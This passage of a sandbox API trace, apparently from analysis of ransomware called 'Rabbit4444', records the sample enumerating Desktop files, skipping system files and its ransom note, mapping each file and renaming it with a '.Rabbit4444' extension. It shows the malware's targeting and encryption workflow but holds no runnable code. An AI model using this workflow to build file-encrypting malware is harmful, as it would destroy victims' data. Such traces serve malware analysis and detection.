"c:\\users\\fd1hvy\\desktop\\4ow_emmxh1r6pq3.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\4OW_EMMxH1R6Pq3.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\4ow_emmxh1r6pq3.gif.rabbit4444"), dwFlags=0x1) returned 1 [0050.008] InterlockedExchangeAdd (in: Addend=0xff618, Value=99328 | out: Addend=0xff618) returned 24758544 [0050.008] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3746 [0050.008] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7237ece0, ftCreationTime.dwHighDateTime=0x1d4ca4c, ftLastAccessTime.dwLowDateTime=0x97a4feb0, ftLastAccessTime.dwHighDateTime=0x1d4d054, ftLastWriteTime.dwLowDateTime=0x97a4feb0, ftLastWriteTime.dwHighDateTime=0x1d4d054, nFileSizeHigh=0x0, nFileSizeLow=0x6480, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7qqNe7s7XL.bmp", cAlternateFileName="7QQNE7~1.BMP")) returned 1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="Rabbit4444.exe") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2=".") returned 1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="..") returned 1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="windows") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="bootmgr") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="pagefile.sys") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="boot") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="ids.txt") returned -1 [0050.008] lstrcmpiW (lpString1="7qqNe7s7XL.bmp", lpString2="NTUSER.DAT") returned -1 [0050.008] lstrcpyW (in: lpString1=0x130eb68, lpString2="7qqNe7s7XL.bmp" | out: lpString1="7qqNe7s7XL.bmp") returned="7qqNe7s7XL.bmp" [0050.008] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7qqNe7s7XL.bmp", dwFileAttributes=0x0) returned 1 [0050.008] lstrlenW (lpString="7qqNe7s7XL.bmp") returned 14 [0050.008] lstrlenW (lpString="Rabbit4444") returned 10 [0050.008] lstrcmpiW (lpString1="e7s7XL.bmp", lpString2="Rabbit4444") returned -1 [0050.008] lstrlenW (lpString=".dll") returned 4 [0050.008] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.008] lstrlenW (lpString=".lnk") returned 4 [0050.008] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.008] lstrlenW (lpString=".ini") returned 4 [0050.008] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.008] lstrlenW (lpString=".sys") returned 4 [0050.009] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.009] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7qqNe7s7XL.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\7qqne7s7xl.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.009] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.009] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14131945984) returned 1 [0050.009] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=25728) returned 1 [0050.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0050.009] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6780, lpName=0x0) returned 0x298 [0050.009] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6780) returned 0x70000 [0050.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.010] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14132138778) returned 1 [0050.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0050.011] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.011] CloseHandle (hObject=0x298) returned 1 [0050.011] CloseHandle (hObject=0x278) returned 1 [0050.015] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\7qqNe7s7XL.bmp.Rabbit4444") returned 49 [0050.015] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\7qqNe7s7XL.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\7qqne7s7xl.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\7qqNe7s7XL.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\7qqne7s7xl.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.015] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c841620, ftCreationTime.dwHighDateTime=0x1d4d418, ftLastAccessTime.dwLowDateTime=0xdc5f7da0, ftLastAccessTime.dwHighDateTime=0x1d4c7e9, ftLastWriteTime.dwLowDateTime=0xdc5f7da0, ftLastWriteTime.dwHighDateTime=0x1d4c7e9, nFileSizeHigh=0x0, nFileSizeLow=0x12e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8KsFVV OpOh6.gif", cAlternateFileName="8KSFVV~1.GIF")) returned 1 [0050.015] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="Rabbit4444.exe") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2=".") returned 1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="..") returned 1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="windows") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="bootmgr") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="pagefile.sys") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="boot") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="ids.txt") returned -1 [0050.016] lstrcmpiW (lpString1="8KsFVV OpOh6.gif", lpString2="NTUSER.DAT") returned -1 [0050.016] lstrcpyW (in: lpString1=0x130eb68, lpString2="8KsFVV OpOh6.gif" | out: lpString1="8KsFVV OpOh6.gif") returned="8KsFVV OpOh6.gif" [0050.016] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\8KsFVV OpOh6.gif", dwFileAttributes=0x0) returned 1 [0050.016] lstrlenW (lpString="8KsFVV OpOh6.gif") returned 16 [0050.016] lstrlenW (lpString="Rabbit4444") returned 10 [0050.016] lstrcmpiW (lpString1=" OpOh6.gif", lpString2="Rabbit4444") returned -1 [0050.016] lstrlenW (lpString=".dll") returned 4 [0050.016] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0050.016] lstrlenW (lpString=".lnk") returned 4 [0050.016] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0050.016] lstrlenW (lpString=".ini") returned 4 [0050.016] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0050.016] lstrlenW (lpString=".sys") returned 4 [0050.016] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0050.016] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\8KsFVV OpOh6.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\8ksfvv opoh6.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.016] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.017] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14132729657) returned 1 [0050.017] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4835) returned 1 [0050.017] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.017] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0050.017] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15f0, lpName=0x0) returned 0x298 [0050.017] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15f0) returned 0x70000 [0050.017] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.017] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.017] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.017] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.017] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.018] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14132859172) returned 1 [0050.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.018] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0050.018] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.018] CloseHandle (hObject=0x298) returned 1 [0050.018] CloseHandle (hObject=0x278) returned 1 [0050.019] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\8KsFVV OpOh6.gif.Rabbit4444") returned 51 [0050.019] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\8KsFVV OpOh6.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\8ksfvv opoh6.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\8KsFVV OpOh6.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\8ksfvv opoh6.gif.rabbit4444"), dwFlags=0x1) returned 1 [0050.019] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c8420, ftCreationTime.dwHighDateTime=0x1d4c753, ftLastAccessTime.dwLowDateTime=0x8cd71760, ftLastAccessTime.dwHighDateTime=0x1d4d1d6, ftLastWriteTime.dwLowDateTime=0x8cd71760, ftLastWriteTime.dwHighDateTime=0x1d4d1d6, nFileSizeHigh=0x0, nFileSizeLow=0x175bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="anMNjT J.avi", cAlternateFileName="ANMNJT~1.AVI")) returned 1 [0050.019] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.019] lstrcmpiW (lpString1="anMNjT J.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.019] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="Rabbit4444.exe") returned -1 [0050.019] lstrcmpiW (lpString1="anMNjT J.avi", lpString2=".") returned 1 [0050.019] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="..") returned 1 [0050.020] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="windows") returned -1 [0050.020] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="bootmgr") returned -1 [0050.020] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="pagefile.sys") returned -1 [0050.020] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="boot") returned -1 [0050.020] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="ids.txt") returned -1 [0050.020] lstrcmpiW (lpString1="anMNjT J.avi", lpString2="NTUSER.DAT") returned -1 [0050.020] lstrcpyW (in: lpString1=0x130eb68, lpString2="anMNjT J.avi" | out: lpString1="anMNjT J.avi") returned="anMNjT J.avi" [0050.020] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\anMNjT J.avi", dwFileAttributes=0x0) returned 1 [0050.020] lstrlenW (lpString="anMNjT J.avi") returned 12 [0050.020] lstrlenW (lpString="Rabbit4444") returned 10 [0050.020] lstrcmpiW (lpString1="MNjT J.avi", lpString2="Rabbit4444") returned -1 [0050.020] lstrlenW (lpString=".dll") returned 4 [0050.020] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.020] lstrlenW (lpString=".lnk") returned 4 [0050.020] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.020] lstrlenW (lpString=".ini") returned 4 [0050.020] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.020] lstrlenW (lpString=".sys") returned 4 [0050.020] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.020] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\anMNjT J.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\anmnjt j.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.020] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.020] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14133110142) returned 1 [0050.020] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=95679) returned 1 [0050.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0050.020] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0050.021] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x178c0, lpName=0x0) returned 0x298 [0050.021] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x178c0) returned 0x70000 [0050.023] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.023] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.023] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.023] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.023] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14133401719) returned 1 [0050.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0050.023] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0050.023] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.024] CloseHandle (hObject=0x298) returned 1 [0050.024] CloseHandle (hObject=0x278) returned 1 [0050.025] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\anMNjT J.avi.Rabbit4444") returned 47 [0050.025] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\anMNjT J.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\anmnjt j.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\anMNjT J.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\anmnjt j.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.025] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5440240, ftCreationTime.dwHighDateTime=0x1d4d302, ftLastAccessTime.dwLowDateTime=0x37580c70, ftLastAccessTime.dwHighDateTime=0x1d4ca62, ftLastWriteTime.dwLowDateTime=0x37580c70, ftLastWriteTime.dwHighDateTime=0x1d4ca62, nFileSizeHigh=0x0, nFileSizeLow=0xfeda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C6uP5iN6LVPrE8U.bmp", cAlternateFileName="C6UP5I~1.BMP")) returned 1 [0050.025] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.025] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.025] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="Rabbit4444.exe") returned -1 [0050.025] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2=".") returned 1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="..") returned 1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="windows") returned -1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="bootmgr") returned 1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="pagefile.sys") returned -1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="boot") returned 1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="ids.txt") returned -1 [0050.026] lstrcmpiW (lpString1="C6uP5iN6LVPrE8U.bmp", lpString2="NTUSER.DAT") returned -1 [0050.026] lstrcpyW (in: lpString1=0x130eb68, lpString2="C6uP5iN6LVPrE8U.bmp" | out: lpString1="C6uP5iN6LVPrE8U.bmp") returned="C6uP5iN6LVPrE8U.bmp" [0050.026] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\C6uP5iN6LVPrE8U.bmp", dwFileAttributes=0x0) returned 1 [0050.026] lstrlenW (lpString="C6uP5iN6LVPrE8U.bmp") returned 19 [0050.026] lstrlenW (lpString="Rabbit4444") returned 10 [0050.026] lstrcmpiW (lpString1="VPrE8U.bmp", lpString2="Rabbit4444") returned 1 [0050.026] lstrlenW (lpString=".dll") returned 4 [0050.026] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.026] lstrlenW (lpString=".lnk") returned 4 [0050.026] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.026] lstrlenW (lpString=".ini") returned 4 [0050.026] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.026] lstrlenW (lpString=".sys") returned 4 [0050.026] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\C6uP5iN6LVPrE8U.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\c6up5in6lvpre8u.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.026] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.026] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14133727100) returned 1 [0050.027] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65242) returned 1 [0050.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0050.027] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x101e0, lpName=0x0) returned 0x298 [0050.027] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101e0) returned 0x70000 [0050.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.029] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14134005075) returned 1 [0050.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.029] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0050.029] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.030] CloseHandle (hObject=0x298) returned 1 [0050.030] CloseHandle (hObject=0x278) returned 1 [0050.031] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\C6uP5iN6LVPrE8U.bmp.Rabbit4444") returned 54 [0050.031] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\C6uP5iN6LVPrE8U.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\c6up5in6lvpre8u.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\C6uP5iN6LVPrE8U.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\c6up5in6lvpre8u.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.031] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4588d10, ftCreationTime.dwHighDateTime=0x1d4d0e1, ftLastAccessTime.dwLowDateTime=0xb78fd790, ftLastAccessTime.dwHighDateTime=0x1d4cb95, ftLastWriteTime.dwLowDateTime=0xb78fd790, ftLastWriteTime.dwHighDateTime=0x1d4cb95, nFileSizeHigh=0x0, nFileSizeLow=0x10b64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ClJz2xAW_8zhk38m.mp4", cAlternateFileName="CLJZ2X~1.MP4")) returned 1 [0050.031] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.031] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2=".") returned 1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="..") returned 1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="windows") returned -1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="bootmgr") returned 1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="pagefile.sys") returned -1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="boot") returned 1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="ids.txt") returned -1 [0050.032] lstrcmpiW (lpString1="ClJz2xAW_8zhk38m.mp4", lpString2="NTUSER.DAT") returned -1 [0050.032] lstrcpyW (in: lpString1=0x130eb68, lpString2="ClJz2xAW_8zhk38m.mp4" | out: lpString1="ClJz2xAW_8zhk38m.mp4") returned="ClJz2xAW_8zhk38m.mp4" [0050.032] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ClJz2xAW_8zhk38m.mp4", dwFileAttributes=0x0) returned 1 [0050.032] lstrlenW (lpString="ClJz2xAW_8zhk38m.mp4") returned 20 [0050.032] lstrlenW (lpString="Rabbit4444") returned 10 [0050.032] lstrcmpiW (lpString1="zhk38m.mp4", lpString2="Rabbit4444") returned 1 [0050.032] lstrlenW (lpString=".dll") returned 4 [0050.032] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.032] lstrlenW (lpString=".lnk") returned 4 [0050.032] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.032] lstrlenW (lpString=".ini") returned 4 [0050.032] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.032] lstrlenW (lpString=".sys") returned 4 [0050.032] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.032] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ClJz2xAW_8zhk38m.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\cljz2xaw_8zhk38m.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.032] 